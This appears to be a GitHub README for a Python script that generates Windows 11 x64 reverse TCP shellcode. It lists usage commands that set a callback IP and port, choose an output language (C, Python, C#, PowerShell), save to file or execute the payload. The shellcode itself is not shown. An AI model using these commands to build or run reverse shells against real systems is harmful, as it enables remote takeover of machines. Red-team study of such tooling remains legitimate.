Shellcode for Microsoft Windows 11 x64

December 22, 2025 ยท View on GitHub

Python Assembly

This script generate Windows 11 x64 Reverse TCP Shellcode with PIC technique.


Usage for generate shellcode

python ./shell_reverse_tcp.py -i 192.168.10.10 -p 443

Defualt language is C type shellcode, also Python, Csharp and powershell:

python ./shell_reverse_tcp.py -i 192.168.10.10 -p 443 --language powershell

For save file:

python ./shell_reverse_tcp.py -i 192.168.10.10 -p 443 --save true

Defualt output is output.bin:

python ./shell_reverse_tcp.py -i 192.168.10.10 -p 443 --save true --output shellcode.bin

For test and execution:

python ./shell_reverse_tcp.py -i 192.168.10.10 -p 443 -execution true

And:

python ./shell_reverse_tcp.py -i 192.168.10.10 -p 443 -execution true --language powershell --save true --output shellcode.bin

Happy learning ;)